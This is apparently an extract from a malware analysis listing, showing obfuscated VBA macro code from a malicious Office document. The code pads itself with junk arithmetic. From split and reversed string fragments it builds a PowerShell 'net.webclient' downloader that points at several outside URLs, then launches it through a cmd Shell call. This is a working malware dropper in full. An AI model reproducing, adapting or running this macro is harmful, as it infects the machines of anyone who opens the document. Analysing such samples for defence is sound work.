CLng(50460)) + aWLzXM + 68546 * jphWn - CStr(21360) / sdIwsw / CLng(LmbsHC)JHpwdEsFLpH = wQpJm("E,HuVaA9+m'+'U9fsamU9+mU9AxmU9+mU91(hmU'+'9+mU9cmU9+mU9amU9+mU9ermU9+mU9'+'of'+';)JmU9+mU9QOmU9+mU9e'+'JmU9+mU9QOmU9+mU9+JQOmU9+mU9xmU9+mU9emU9+mU9.mU9+m'+'U9JQO'+'(mU9+mU9 +mU9+mU9 BSNmU9+mU9Ax1 +mU9f", 35600 + 2 - 35600, 35600 + 193 - 35600)tThBtb = SvSMoXisUrt = (ijidh / zLYXfE / 63452 / Fix(pWAVuj)) + 40717 - CLng(iqjDRC + CLng(64318)) + GBOzwJ + 69832 * TQbLt - CStr(46314) / IHphHs / CLng(wKjHBs)vKXfT = FJmBoQDtHU = (imzjf / tdaLl / 86085 / Fix(zIotH)) + 20461 - CLng(HwXzn + CLng(70705)) + mGqrEF + 49019 * fELiUl - CStr(80369) / uXtbqH / CLng(KlwQvf)RanZst = wQpJm("Y0BU9nar )mU9+mU9JQOtmU9+mU9JmU9+mU9QO+JQOcemU9+mU9jmU9+mU9bo-wJmU9+mU9QO+JQOemU9+mU9JQO+JQmU9+mU9OmU9+mU9nJQmU9+mU9O(mU9+mU9& = dmU9+mU9smU'+'9+mU9adasnAx1mU9(( '(( ( )'x'+]03[emohS2
", 87545 + 4 - 87545, 87545 + 178 - 87545)wvuWH = kThnAdkhcqS = (VccuI / fifGIp / 57680 / Fix(QGQjw)) + 58336 - CLng(taqFb + CLng(81010)) + sdIGzd + 19046 * VBlics - CStr(9263) / YwWhN / CLng(Rtsozb)khWJUo = FuuQhmrhLjj = (wzprC / jMDBs / 48721 / Fix(qHCChM)) + 97831 - CLng(RjzkT + CLng(28418)) + inaNL + 54509 * nriGSF - CStr(21325) / sBqBn / CLng(pfiWkN)PXzObwjG = wQpJm("PzTBfU9+mU9OmU9+mU9tcejbmU9+mU9o-JQO+JmU9+mU9QOwJQO+JQmU9+mU9OenJQmU9+mU9OmU9+m'+'U9(mU9+mU9'+'. =mU9+mU9 UmU9+mU9YYmU9+mU9A'+'mU9+mU9x1'+'mU9+mU9;modmU9+ml", 4687 + 2 - 4687, 4687 + 150 - 4687)QqHinj = PbfNDFKXaut = (PnztSb / sIwrb / 28122 / Fix(XAWYi)) + 46964 - CLng(mRWdwi + CLng(22082)) + HDcqNS + 54674 * OQMIkG - CStr(59984) / moBwJB / CLng(PVScW)azHoV = OTMGQZsWYY = (FwfKvY / iWMMjj / 93170 / Fix(zXkllo)) + 96039 - CLng(Yikkzf + CLng(4732)) + QlYuV + 87121 * EjBnt - CStr(3313) / dWUic / CLng(lnmwH)QLBqDsrNl = wQpJm("iEmU9h@/4mU9+mU95mU9+mU9AQT/moc.akhcmU9+mU9si/mU9+mU9/:pttmU9+mU9h@/zoamU9+mU9R/ppa-pmU9+mU9pw/k@rnEp", 52305 + 6 - 52305, 52305 + 94 - 52305)HbKnn = TtwzLPDHjB = (BEhREO / UDhhc / 99162 / Fix(mGlot)) + 92644 - CLng(kZIKj + CLng(20860)) + PYNFl + 2892 * ChqXwW - CStr(35941) / mMTzlP / CLng(STnFX)hPTKO = QXWjscCzfiTI = (cNzub / jMTTL / 69025 / Fix(fuRYTB)) + 14332 - CLng(Ydojj + CLng(22700)) + zjmrK + 81518 * USZjw - CStr(5058) / DDYIr / CLng(HiGKS)TFVVZwcU = wQpJm("bkR,mU9+mU9/mU9+mU9/:pttmU9+G.", 32819 + 3 - 32819, 32819 + 24 - 32819)zEjJN = EOPmjTuHZzw = (CEKUaP / prJOa / 53422 / Fix(JqTkJ)) + 22277 - CLng(tooRWF + CLng(66288)) + MijIaP + 92570 * jJtpEN - CStr(8895) / MEuQE / CLng(opnvJQ)ZzGUK = ZNoTjDUcwn = (TjbIYv / ziiWWz / 83355 / Fix(vliaMo)) + 46767 - CLng(KNoBUt + CLng(1306)) + itXCwu + 31946 * LmNfqr - CStr(32893) / oYHjw / CLng(asuJR)kQsGjzmtv = wQpJm("KJ1.mW9.JQmU9+mU9O/1mU9+mU9RI505mU9+mU9D/ue.tmU9+mU9enmU9+mU9remU9+mU9f'+'emU9+mU'+'9ik//:ptmU9+mU9thmU9+mU9@/mU9+mU9tunJ/smU9+mU9_cip/mU9+mUi", 41351 + 2 - 41351, 41351 + 135 - 41351)ktNDhI = dcozBUPZbsj = (wVMvl / bKSfH / 75799 / Fix(VpSZJz)) + 66513 - CLng(nrAbG + CLng(28220)) + IBRCZz + 96642 * jRRQj - CStr(54964) / zjKYz / CLng(zzRuA)JdMUf = iCROFcXalI = (hCbcuT / hPfLB / 99650 / Fix(YlplT)) + 94704 - CLng(Nwatja + CLng(92888)) + bnLrYN + 97374 * jjsDzn - CStr(4695) / POwpri / CLng(RKGTEA)kicwzQtiaMOhd = LtUlnsAJbuaw + """" + BatoavkicHEtz = jStulzziLzK = (FnEOtZ / rQRtIQ / 8880 / Fix(RNhuuH)) + 55493 - CLng(AfMKc + CLng(52475)) + cbluY + 65088 * sKTJC - CStr(30981) / AmVti / CLng(ViFQic)dowlFKYHb = DjhPLPFpRWW + zPHvPqrDOGFFzX + ItVWakEMIAt + sRCFDzprwV + kicwzQtiaMOhd + RusqwWVLvDTId + UKjPWqjNw + RanZst + PXzObwjG + ljaakrr + ZWhhiPzoP + EoHkR + tMMvPYQ + QLBqDsrNl + TFVVZwcU + LshKN + kQsGjzmtv + wdBSwU + JHpwdEsFLpH + cUuaIu + cwAkETD + ANzhp + wCffbz + aYofqzcWsE + UMWrAHbUn + ZiFiTzufS + dJWjrwmKKi = zNapzifiQV = (qpwQX / rvBKk / 9037 / Fix(MtWmS)) + 4350 - CLng(RisETD + CLng(81377)) + rphfhQ + 36310 * FhPvTn - CStr(26095) / cVPnOH / CLng(LNYmLz)End FunctionSub ClboX(GRFEQ)JHMYm = lOcjIocHjsC = (iiJIh / LqEdjv / 96136 / Fix(qpbDn)) + 19922 - CLng(MofSdj + CLng(99413)) + BZZCrl + 49039 * zfvbLj - CStr(70090) / oKuzmf / CLng(EsQSpi)DvLwDD = sGPRqYsjljE = (iTmBHV / UKbTjU / 19727 / Fix(APPcjp)) + 92803 - CLng(fjwDD + CLng(24235)) + fmlvK + 69235 * JohGm - CStr(65518) / whVRzs / CLng(WDXti)End Sub", File "HULSuHBvj.bas" (Streampath: "Macros/VBA/HULSuHBvj") has code: "Sub HqLkvVSjBLW()On Error Resume NextYzrqFa = aCOYjzlFUpIj = (CcUBp / PMijjP / 65929 / Fix(SGBNvI)) + 95544 - CLng(TrYUkj + CLng(77107)) + LnzlWW + 44716 * QzfNYh - CStr(79242) / RiTzT / CLng(NaPLIc)End SubFunction sRCFDzprwV()On Error Resume NextUtiYrV = RzaviLwcjSmC = (DFNoT / ZWVKNu / 22892 / Fix(DwphLs)) + 4421 - CLng(DXRHi + CLng(28463)) + ftWaYQ + 75812 * kXlWu - CStr(52937) / iozAu / CLng(ulaJCi)jwZiwN = SqdffKzRFfw = (KtUTf / zJjaiL / 2216 / Fix(twJJs)) + 23409 - CLng(iAhrf + CLng(38849)) + cRsvk + 38885 * pdFCz - CStr(27376) / iPzTi / CLng(RwIwnm)ZIZwH = wQpJm("H2z% tes&&rHBCSAFllQp0k", 93198 + 4 - 93198, 93198 + 17 - 93198)csnbA = khSiibDDVDGs = (zzliYB / zdJvIz / 27601 / Fix(zpiBXd)) + 54105 - CLng(jQrzY + CLng(25687)) + EpuoGc + 13193 * DzknD - CStr(18215) / aiSMGj / CLng(EVUXj)lWBNc = TOqzhjolOqKE = (HawjL / inabz / 91591 / Fix(LtbczA)) + 48825 - CLng(umErl + CLng(94178)) + mHzmw + 72278 * KYUBD - CStr(27408) / oPAlof / CLng(JmtKfQ)NUjTpWHKioO = wQpJm("HjwUfYsdMLdmXo%!!%Isoh8W", 9393 + 4 - 9393, 9393 + 18 - 9393)otoZc = ASdNzIjDHwwL = (GWEGz / GcVEb / 36104 / Fix(CVifb)) + 52842 - CLng(fVlmof + CLng(67651)) + GfwOU + 82745 * SpicK - CStr(44803) / zZlin / CLng(NYbUVa)EQucdi = nzaGpjKIHIk = (fPWlDb / aoRwjP / 55077 / Fix(viofrD)) + 16708 - CLng(KZfYUO + CLng(25932)) + XEGEp + 88013 * YBGPz - CStr(65056) / aZDiOi / CLng(dtfXa)EUrpOkhrC = wQpJm("MBDtes&&zsTahziwh48", 87114 + 4 - 87114, 87114 + 13 - 87114)MYDHM = GabIXrVPdko = (GizFU / zjsuLa / 64207 / Fix(hwzww)) + 5217 - CLng(bBwQf + CLng(74767)) + ICzIr + 27328 * dNSiR - CStr(24923) / OjQiqc / CLng(ZQill)jRccs = GTKaVuYuUfZ = (LiVib / Ujrjf / 73832 / Fix(czVhRR)) + 97653 - CLng(SMSOkZ + CLng(51563)) + czkrRX + 73552 * jAWYX - CStr(28775) / ioqGzC / CLng(DNaWt)fwLFvsQ = wQpJm("AKfYB%fXnREwX%!!%NoBBQA", 69883 + 5 - 69883, 69883 + 14 - 69883)CTrht = PkuuNLHzQv = (cDcoat / dbQwX / 33270 / Fix(iQLQJp)) + 58276 - CLng(zzktc + CLng(3728)) + vOmRzu + 78974 * OtzOQa - CStr(98110) / WdTavv / CLng(HFwHEd)hwEqq = BVijUhzTwZJ = (NcwWz / jQLBQ / 4531 / Fix(LAkvMQ)) + 97454 - CLng(fwwNtl + CLng(44327)) + TMGTP + 75605 * jZGkJC - CStr(81049) / RiaPh / CLng(YkIKr)RCSNH = wQpJm("I7 !%PInYdOqGm%!!F6.zww", 7908 + 7 - 7908, 7908 + 15 - 7908)dBJEUJ = roKiiZAVFj = (ipiiiS / pwvbz / 17770 / Fix(FwhPC)) + 30076 - CLng(vwfHv + CLng(93136)) + INCfcV + 24843 * zXalwT - CStr(19882) / MNZGSc / CLng(GCQoj)CktSz = irLZfNVWiKk = (FwhfOt / wPjANo / 75862 / Fix(bjnqCC)) + 36673 - CLng(wjCzap + CLng(59490)) + oJYvG + 40885 * iYPqO - CStr(15706) / Mqatu / CLng(vUhjlU)qcuLO = wQpJm("b.8Z59uesf7", 82066 + 3 - 82066, 82066 + 2 - 82066)wMvJHl = MDPsVbIRmM = (UnULX / uoYTbo / 18108 / Fix(mFRcGi)) + 56616 - CLng(wIbiXo + CLng(27393)) + CvXhzv + 58256 * YcMwr - CStr(87289) / bijTVq / CLng(jdbboM)Luckp = qswVbNMzWmjt = (WnQZin / itkaRp / 84679 / Fix(jHuvwf)) + 85586 - CLng(TcDjJR + CLng(24245)) + SbPsY + 56886 * GBIIw - CStr(26010) / JXuiQP / CLng(lwQdCw)UWifdl = wQpJm("it.wes&&w^o=pJz56", 69791 + 6 - 69791, 69791 + 8 - 69791)bDbQjN = qZzIDotoXt = (ZSfoi / zjhiz / 29167 / Fix(jGfzh)) + 83521 - CLng(AmTzv + CLng(41601)) + KCrIt + 69041 * XivPwP - CStr(68360) / aLajmW / CLng(JwHfcW)drUhiJ = HLpBpfXSnU = (hRpYBB / FIlzW / 14572 / Fix(pTiPO)) + 82205 - CLng(JYMGVW + CLng(72897)) + Nwpzc + 50123 * nSTfG - CStr(7769) / WOSuP / CLng(MpCZd)vldhdB = wQpJm("s6VTGHTG% tGqjH2LX", 74223 + 8 - 74223, 74223 + 9 - 74223)XtcRff = lumHXiUfPwjk = (EBwobG / HYvPV / 74024 / Fix(aKAoA)) + 38089 - CLng(KjGvP + CLng(30896)) + jZGqs + 19917 * ridDY - CStr(45464) / VrsBsz / CLng(UOHiQN)RpuUHE = XTcAHYzGlCJ = (oiMBX / EAtFdM / 68202 / Fix(nlkfhT)) + 14631 - CLng(VNRtGp + CLng(24241)) + Brkizj + 55294 * wWAwdO - CStr(98109) / YljMWF / CLng(qwwNz)fSJSUk = wQpJm("QPDR% tes&&JXzpEFJorrplRzo", 88291 + 6 - 88291, 88291 + 17 - 88291)idOnFD = bEpEIrLSLNGO = (VVJARv / ufBWd / 15268 / Fix(smIYK)) + 25631 - CLng(TwcDi + CLng(43726)) + XniGk + 13494 * IEnoI - CStr(28207) / ZnhfjQ / CLng(jCpwB)NmdmL = HtDoQjwSkUI = (dfavL / XEioEW / 49863 / Fix(TvdJk)) + 62608 - CLng(PlClo + CLng(55253)) + EiZJa + 6745 * omrRK - CStr(78165) / ZFzRqc / CLng(Dobjcv)BbKMcdWaK = wQpJm("JrwHsum%KGj", 34626 + 5 - 34626, 34626 + 5 - 34626)tXKXz = zAOuvkfIms = (rapjDT / AdBtwa / 96301 / Fix(FuPjt)) + 20364 - CLng(tZqFWU + CLng(83223)) + uBiIk + 39720 * MUrZz - CStr(68249) / GQUzOf / CLng(tGwPPj)ofOOCi = ozCKGVYszl = (UfqbZ / aVFinj / 88605 / Fix(jjrjuC)) + 34342 - CLng(jvwOEO + CLng(48952)) + dkSkFB + 96296 * oWbIz - CStr(12142) / VQQcm / CLng(JEjAtv)mViitpfTZhC = wQpJm("swJrwkwHsum%!!%FWraW1", 31541 + 4 - 31541, 31541 + 14 - 31541)iKnMwG = COJkinuYaJa = (lbwoln / UjjkM / 12126 / Fix(ZijPM)) + 87179 - CLng(IHHjw + CLng(1578)) + OfIrSS + 18883 * MzaJn - CStr(70624) / fZXYi / CLng(QoLwh)lSXBiq = mAmbBIrqMrZC = (YKZjU / cECKSN / 70993 / Fix(WUHVW)) + 82531 - CLng(FXCwA + CLng(33539)) + zjCdd + 45861 * IzRJC - CStr(242) / wcJoXF / CLng(WFWCL)cNawKTwH = wQpJm("T2swdMLdmXo% 3pK", 53470 + 4 - 53470, 53470 + 9 - 53470)TnXnU = HGTIoNNOWpL = (qZHut / cLBbd / 61361 / Fix(RMtVai)) + 79689 - CLng(sbiTVE + CLng(20524)) + GzPKiV + 72516 * sifrJ - CStr(12826) / pcMRAU / CLng(vKWnwz)rOipTk = wEtQfJvfrMRt = (jSaVtm / CInzjm / 18940 / Fix(CZvXL)) + 68428 - CLng(PQSQA + CLng(8436)) + wKHnwL + 92763 * UZwzv - CStr(91944) / QvXcW / CLng(SRuhuM)JPimhzLJT = wQpJm("kOfWrnZBf% tes&&r^e=%Sf.W,", 55451 + 6 - 55451, 55451 + 18 - 55451)JCdli = KdsvqctFWYN = (XIAXtY / EjtMFB / 97923 / Fix(zRvMPa)) + 72253 - CLng(YAjitj + CLng(24221)) + VTGpuJ + 60194 * NAQdjf - CStr(80044) / zjunaM / CLng(NlfcWM)pZjXEv = oZbzwEiNOFF = (qjAwXc / hpfifE / 41965 / Fix(DwXbn)) + 58780 - CLng(jILhi + CLng(55001)) + AjCwU + 15086 * ZnzbO - CStr(9435) / tzRrii / CLng(PqiSIb)pBLVYEZbLId = wQpJm("Fq&ll=%PInYdOqGm% 57im", 88965 + 5 - 88965, 88965 + 16 - 88965)rkquE = pwbjkTdLYz = (ZQmLt / AwolsY / 62363 / Fix(jCiCI)) + 64219 - CLng(rJzVl + CLng(14274)) + KBESf + 88885 * KQjqBt - CStr(11119) / DDDzY / CLng(RvIPSN)iRHXma = MztiXBjUMVU = (CmDiI / uViTW / 9784 / Fix(hUdPw)) + 24211 - CLng(iVlfz + CLng(65329)) + QirQRE + 32509 * vOdPSj - CStr(83470) / fWdBEh / CLng(ENICn)wBQQMR = wQpJm("wQd%!=%FvIs0ZC", 65583 + 7 - 65583, 65583 + 6 - 65583)BYjadd = rCEAEBPljtm = (qGIUfl / bmDJCd / 95296 / Fix(qwppCz)) + 76068 - CLng(SczCIn + CLng(36847)) + OPwquP + 22515 * rtQEzv - CStr(95853) / EiZotE / CLng(rDdqri)ZAzPa = CFwSPFzXVBz = (QDViwz / ORjzYw / 96172 / Fix(njzLNC)) + 64916 - CLng(bASwK + CLng(73067)) + VFzQF + 31199 * WDRoX - CStr(72773) / wuRHN / CLng(nYqjj)iZKSpWMfDs = wQpJm("vv0vssBOtes&&!J", 67697 + 2 - 67697, 67697 + 6 - 67697)CtidBb = wOtYhsjNttZi = (fdFBoz / iwPPhW / 26837 / Fix(saQNv)) + 74958 - CLng(EVjOk + CLng(51242)) + fwJEmW + 31485 * cMdAU - CStr(34691) / JzVOZV / CLng(dMjIY)wWDru = hnPtSGazQvN = (OficXh / Lsnuk / 26159 / Fix(ZscvN)) + 7703 - CLng(aSdJLJ + CLng(20570)) + vmszNz + 52969 * ujJlJ - CStr(77249) / UIFKj / CLng(XVhJHn)fPRtRoqA = wQpJm("5XcR=%RsCOuwtHJRpYL% 3a", 47362 + 3 - 47362, 47362 + 17 - 47362)ATMYw = zABlzwYiPE = (imSJB / wiIYR / 20527 / Fix(FLOTbT)) + 70675 - CLng(pqzSXF + CLng(81209)) + KpFdrd + 2697 * rRGZTL - CStr(48856) / rvtJjE / CLng(vTiov)zRarRf = hjckcAiaYmm = (pXTpX / KivVBb / 49994 / Fix(MtDKw)) + 42701 - CLng(tPQPYW + CLng(67620)) + dUojs + 9203 * wlUfUO - CStr(74782) / aICmp / CLng(XNpQTv)HGiADLNKKN = wQpJm("Z18aIlstes&&eh=%fXnREwXL,", 36115 + 3 - 36115, 36115 + 16 - 36115)CZwPb = RANshluSqR = (hGBqH / ktXGG / 98138 / Fix(YISvL)) + 43264 - CLng(ssVMN + CLng(31113)) + cDqEX + 46206 * mpFLS - CStr(52878) / izLuOZ / CLng(ATzGT)RbAHL = nuiclIHBcuD = (hqodGf / ViQKNv / 5468 / Fix(hUaOTi)) + 7583 - CLng(aMSAvr + CLng(75075)) + AwqoZc + 96259 * cbzEiT - CStr(28733) / cIZhBj / CLng(wdEOQn)iPFGnYsGFvi = wQpJm("lDlPGtes&&GwBRPlJz=%mKF", 1883 + 3 - 1883, 1883 + 15 - 1883)nivcJP = OZEWjsizGGz = (XnRFlU / tKUOh / 12739 / Fix(oVJBKz)) + 72445 - CLng(jUKVu + CLng(84053)) + izHSL + 15482 * MpqpA - CStr(20418) / EqoZp / CLng(JpFww)tzRDXI = zjUGzzWGvv = (hCpdF / YGwLX / 60147 / Fix(PdYbC)) + 32824 - CLng(JYhLb + CLng(35979)) + UvCcJY + 54552 * tETLs - CStr(97126) / UlLpj / CLng(sYvEij)YAzLJjzu = wQpJm("12Ces&&s=%NoUfYsKZ7J", 81392 + 5 - 81392, 81392 + 13 - 81392)JVdCm = EKviNuMkUH = (YMHEvA / jKbXHX / 60480 / Fix(WtYaRY)) + 50986 - CLng(rYDwio + CLng(40718)) + DnOFX + 96340 * ZdQDH - CStr(54232) / oKiRYS / CLng(tqRzS)MBJkOr = RQYjNBdEVc = (pbiimJ / pqmJNu / 51480 / Fix(jcrbi)) + 17606 - CLng(TNOmwQ + CLng(20585)) + JVoljL + 64293 * WbPBQ - CStr(61192) / LomER / CLng(MttXK)upLfisAzi = wQpJm("spnZBf%!!%RsCOukici", 31841 + 5 - 31841, 31841 + 13 - 31841)RQAMi = CdnZJuCFVATH = (nFCzK / sowcu / 27814 / Fix(DQHVO)) + 64001 - CLng(NCUmf + CLng(85231)) + Pursa + 30488 * ULNDCW - CStr(72418) / jKiuX / CLng(mwzmlk)iwpYVv = MfNjtTpFnzHY = (zfcPD / HzznV / 42417 / Fix(tLrZE)) + 8773 - CLng(zzRmo + CLng(63813)) + HcmqVG + 53514 * RMISsl - CStr(24831) / aKWzDd / CLng(OsDVR)QMWPujSG = wQpJm("B2UMNJ=%VHTUTCEY0Cd.", 1890 + 7 - 1890, 1890 + 11 - 1890)OqaWVA = NwAPuufQmL = (mRqbR / ddOYzR / 71700 / Fix(lCViv)) + 43927 - CLng(pSiKHC + CLng(91457)) + iwGrCf + 64559 * OJmsW - CStr(16171) / ziikWr / CLng(iqphw)YETmF = WTjMHWGjrDT = (fHSpB / UGhkj / 20486 / Fix(vslbqf)) + 18670 - CLng(KWzDB + CLng(45139)) + CrjIbJ + 73123 * FPRMk - CStr(13772) / jzBLjd / CLng(HBXKF)NcBwhXWKd = wQpJm("YZ&p=%TjDEXVkGksKp% tps2SA", 98373 + 6 - 98373, 98373 + 19 - 98373)lSmAC = EqEajmqfMYT = (AUnCB / oHhjfl / 33480 / Fix(QQmcR)) + 19048 - CLng(DwiWS + CLng(47903)) + mpvcE + 71585 * AwQkL - CStr(27734) / WGZpRi / CLng(asjHJX)SAZjXP = DDaTSPpAnkS = (Twkqn / Sptjj / 2807 / Fix(SfQETc)) + 37751 - CLng(iETIP + CLng(11638)) + DjoCX + 82100 * UPivBw - CStr(34902) / XrSbN / CLng(YwTHwB)tsUDDJi = wQpJm("wFc.l&%", 95443 + 2 - 95443, 95443 + 1 - 95443)tRhYQQ = JrhdAqBVYaX = (Uhcqo / SfnVuY / 78311 / Fix(bwBXkj)) + 62328 - CLng(fKobW + CLng(51035)) + avjbB + 39099 * orkXz - CStr(11671) / WmELD / CLng(DUAqrT)dVLzcr = ZavjNbJPbXbz = (IASBu / RLFpz / 34269 / Fix(QUivoE)) + 37036 - CLng(OLwJkR + CLng(17686)) + MzoLVU + 39617 * wiYRNU - CStr(13065) / vvXphj / CLng(WjjtpT)DSGIPrKNWlU = wQpJm("BSvYhmXnjzGDhFf% te,wdP", 39062 + 5 - 39062, 39062 + 17 - 39062)JBHVtr = GKvzoFfBMtE = (NptTJ / OSfpbf / 49509 / Fix(ZWJsb)) + 29002 - CLng(plcps + CLng(68137)) + qiTAkE + 57267 * IoLNd - CStr(83262) / UUUPpj / CLng(rUSpq)SNvjhV = SMiqFwhzGNEV = (bAYlp / YJAGLp / 39266 / Fix(vOEVS)) + 13845 - CLng(KOKCaL + CLng(78721)) + jjowa + 82089 * WzsjO - CStr(17673) / XiPcI / CLng(lBslOT)NhiDbVW = wQpJm("iQwRHh=%zNafst", 46084 + 5 - 46084, 46084 + 7 - 46084)mNjOa = wUXWttirGdjs = (zrjmwD / birDh / 14930 / Fix(aIOdJ)) + 60421 - CLng(rzIWi + CLng(59217)) + tvOCW + 65254 * uhzQW - CStr(62586) / pjSMl / CLng(HisAZ)MnREwP = JliTCboucEd = (ciAiQY / rwvzzr / 85060 / Fix(zzdIJJ)) + 92620 - CLng(TjUFmk + CLng(14670)) + uzoGdn + 74104 * YZjKpj - CStr(39902) / jBpzz / CLng(UTjChv)zqmAkSWEVfF = wQpJm("4fiIIsowkw9zu", 25393 + 5 - 25393, 25393 + 5 - 25393)TCHqHD = ClzMKpjclqmO = (WluKp / iVabFr / 85952 / Fix(WYTid)) + 40200 - CLng(zEdmK + CLng(20141)) + quLvjl + 93929 * MjREU - CStr(64836) / VGTwf / CLng(DRHJt)JbaKY = QvwMBLnkzFV = (DLauX / TnlZBM / 51795 / Fix(CbXVt)) + 87424 - CLng(GvEzW + CLng(56438)) + vlRXI + 6315 * MihCX - CStr(7828) / iVwza / CLng(IMNiM)mOLCQVHchW = wQpJm("miYJYs&&!%TjDEXVkGksKp%!4iJh", 1562 + 5 - 1562, 1562 + 19 - 1562)EzPVuA = JrAIiXwqsp = (Vpjba / zwDBj / 46627 / Fix(KjwYwM)) + 75198 - CLng(PudiN + CLng(36117)) + DaSUXL + 82395 * XWpNuE - CStr(9529) / IbUTX / CLng(atfCR)bBAvjc = HKXnjnIiLzzO = (uIPas / IHJlOt / 10630 / Fix(SpjiA)) + 48004 - CLng(WLvSS + CLng(94703)) + rpmjz + 18177 * slVnhc - CStr(93) / mZphN / CLng(tbOzpz)uznHTbW = wQpJm("iHbjvnmRsnurupvH% tQRZl", 12488 + 5 - 12488, 12488 + 17 - 12488)wTHZw = PTwftwZEOuSw = (VZVdk / izOYkK / 20024 / Fix(wROOj)) + 78837 - CLng(hnuvlc + CLng(32346)) + NUjsfD + 43962 * ipOISF - CStr(50383) / jlcdmz / CLng(jHjnlb)dkkwjh = iDNvcAUHSGj = (XjPVbX / pLpjS / 49926 / Fix(dqTnj)) + 50826 - CLng(EmbBK + CLng(84180)) + RzDlZ + 16899 * wUPXI - CStr(61279) / SNjdC / CLng(XdnfXI)JcSJhokzZTa = wQpJm("WUwtHJRpYL%!&,0@Fwr", 63604 + 7 - 63604, 63604 + 11 - 63604)TtoTQ = oYMlvskjVEQ = (uAmZuY / FpnLY / 27274 / Fix(sCCjv)) + 11639 - CLng(rwFblk + CLng(71800)) + qIjPw + 27579 * jUtvI - CStr(50555) / lBNhcY / CLng(ioIKzD)iJohQ = RRRrESYljb = (mOvZAz / irjzQB / 28827 / Fix(ozbPw)) + 87607 - CLng(UtiMOr + CLng(98855)) + aVQkud + 17490 * IrwmP - CStr(64258) / Aqpjd / CLng(KRdhJt)rqYwX = wQpJm("Vi7LLkVNwWksWbmhl% t7w", 8268 + 3 - 8268, 8268 + 15 - 8268)qnjri = JizQUqsSXzHN = (bhVZKV / PDnCk / 68030 / Fix(OVIHH)) + 37582 - CLng(nBaUq + CLng(96340)) + rtdawG + 52135 * RKhJb - CStr(87611) / MNkGYd / CLng(PsztPn)GjhANT = BGLkmjmKsmdk = (rAuNX / nzchF / 17478 / Fix(dRzdSF)) + 50094 - CLng(fhtuJh + CLng(50704)) + QIIpcO + 61350 * npMnBi - CStr(56547) / dBAVNP / CLng(YKaLS)jHvjjvwYR = wQpJm("wSDqYpBsz", 63022 + 5 - 63022, 63022 + 3 - 63022)SOZMI = ZwTFPJpdsmi = (EORIh / dBoki / 3623 / Fix(MmUan)) + 50711 - CLng(SDjJvk + CLng(67199)) + ZqjYs + 18958 * nBFrH - CStr(58185) / lLpDM / CLng(XVCFM)hLafP = wDiICHSizhA = (ZVYJJ / iooBrj / 53496 / Fix(IMNAB)) + 85652 - CLng(VVdmW + CLng(3743)) + cbSBq + 35896 * fICRB - CStr(69862) / JBrbaC / CLng(GQzfH)aVjIS = wQpJm("kso=%pzUCKIcbi", 78185 + 7 - 78185, 78185 + 6 - 78185)DzuXn = TMNjppCcDLj = (ICMTmK / zCVKTV / 66897 / Fix(zjOid)) + 49179 - CLng(lwSBl + CLng(33299)) + hDFQjz + 8029 * jHNrcQ - CStr(81353) / PUHzD / CLng(ojFaqQ)CGiBof = scSSGRuDYLT = (UuzVP / wmuIkz / 46674 / Fix(CnfCv)) + 48060 - CLng(AHHCZ + CLng(75156)) + iVwuE + 62523 * HIJmM - CStr(63123) / zUhUi / CLng(OGXWP)wVurLGdno = wQpJm("r11%bHYKFlwod% tesXYf%5", 29395 + 6 - 29395, 29395 + 15 - 29395)sTmqSp = fDYLqskufVQi = (BCnahq / EczZi / 20271 / Fix(CVSqwX)) + 1829 - CLng(ZIqbq + CLng(78991)) + bBGhB + 82524 * zPlzb - CStr(53568) / amMiDi / CLng(MiTKr)JqFzPI = UKNaSnDnFmpb = (BEmwZ / lVKEr / 85367 / Fix(HwjbQR)) + 9873 - CLng(mmwHJ + CLng(11805)) + fORYrP + 15860 * SzpmHw - CStr(98279) / iaIiE / CLng(iVYWz)wlDJD = wQpJm("6Kt%bHYKFlwokA4", 64962 + 4 - 64962, 64962 + 9 - 64962)SqqQP = qwmTAzMOcb = (zVndNh / bZXjw / 677 / Fix(RtTbI)) + 49126 - CLng(AHCWP + CLng(50178)) + istCus + 48447 * bpdJOo - CStr(65023) / MqSfw / CLng(smTBI)sRCFDzprwV = qcuLO + uznHTbW + iPFGnYsGFvi + NcBwhXWKd + tsUDDJi + wVurLGdno + UWifdl + vldhdB + jHvjjvwYR + QMWPujSG + EUrpOkhrC + fPRtRoqA + mOLCQVHchW + DSGIPrKNWlU + NhiDbVW + fSJSUk + BbKMcdWaK + zqmAkSWEVfF + JPimhzLJT + wBQQMR + wlDJD + iZKSpWMfDs + cNawKTwH + YAzLJjzu + rqYwX + aVjIS + ZIZwH + HGiADLNKKN + pBLVYEZbLId + JcSJhokzZTa + upLfisAzi + mViitpfTZhC + NUjTpWHKioO + fwLFvsQ + RCSNHOkGzHI = hihCHwRiwzKi = (opjzu / YzGisk / 53767 / Fix(qijCG)) + 82865 - CLng(ofnLj + CLng(17990)) + OoUqZi + 49336 * ZAMOYi - CStr(45048) / JWUbbv / CLng(zErSz)qXMFK = pRrTnQbFJaW = (tnocH / USlIvR / 43267 / Fix(kfMLjL)) + 42538 - CLng(wrUMUi + CLng(9492)) + bAmupP + 2599 * EbqGEJ - CStr(90611) / Qwfws / CLng(tKlHoz)End Function", File "uIpNwjvi.bas" (Streampath: "Macros/VBA/uIpNwjvi") has code: "Sub sVdSGF(PhpwT)WwIwcG = JiaDnKAtIcz = (oGJSa / oqVZwB / 77713 / Fix(mrEzEp)) + 5351 - CLng(Juafw + CLng(74079)) + WZNww + 14261 * oqWkR - CStr(73044) / IbBwLj / CLng(oIYJU)wOsvw = WzAlErVCNdT = (QfATY / kGJhQp / 75556 / Fix(lUZwbn)) + 28463 - CLng(oIqwG + CLng(39652)) + HbfEl + 6638 * wvTOMw - CStr(23937) / kvRQF / CLng(cPBjJ)End SubSub musHwkwosI(oXmdLMdsYfUoN As String)On Error Resume Nextrscba = uCGklYuYii = (bSDWY / fpOKfL / 57139 / Fix(bCzDT)) + 85184 - CLng(wBKLzK + CLng(29534)) + LcwkpE + 83249 * UTiwkA - CStr(70028) / uGNaW / CLng(ULmXfQ)LYkPzD = jboTkEkkwEvR = (QszoVQ / nzRZa / 9282 / Fix(uzjmz)) + 5567 - CLng(TSuqRP + CLng(69159)) + qSkzGv + 62473 * bcmYtd - CStr(42537) / JzVpnP / CLng(zOwzZ)[Shell] zEBYN + Chr(vbKeyC) + oXmdLMdsYfUoN + zpawOO + EKKizpw
